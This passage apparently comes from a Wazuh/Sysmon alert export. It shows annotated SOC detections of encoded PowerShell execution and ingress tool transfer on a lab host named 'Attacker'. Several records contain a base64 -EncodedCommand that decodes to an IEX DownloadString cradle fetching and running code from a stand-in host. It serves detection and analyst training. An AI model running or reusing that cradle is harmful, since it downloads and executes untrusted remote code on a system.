Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:48.4891010Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284883
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:48.448 ProcessGuid: {94294ddc-bd76-680a-890b-000000000e00} ProcessId: 16036 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_q0avipez.2ek.ps1 CreationUtcTime: 2025-04-24 22:38:48.445 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:48.448
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd76-680a-890b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16036
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_q0avipez.2ek.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:48.445
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:53.168+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:53.168+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  78
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534333.1722386
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:50.8815173Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284919
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:49.689 ProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00} ProcessId: 3688 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd76-680a-890b-000000000e00} ParentProcessId: 16036 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:49.689
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd79-680a-8b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd76-680a-890b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16036
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:53.185+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:53.185+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  82
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534333.1730453
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:51.0649204Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284920
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:51.047 ProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00} ProcessId: 3688 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gguk2unw.kfw.ps1 CreationUtcTime: 2025-04-24 22:38:51.047 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:51.047
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd79-680a-8b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gguk2unw.kfw.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:51.047
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:55.625+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:55.625+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  79
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534335.1733218
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:53.6335273Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284943
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:52.123 ProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} ProcessId: 14828 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00} ParentProcessId: 3688 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:52.123
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd7c-680a-8d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14828
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd79-680a-8b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:56.476+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:56.476+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  83
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534336.1741285
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

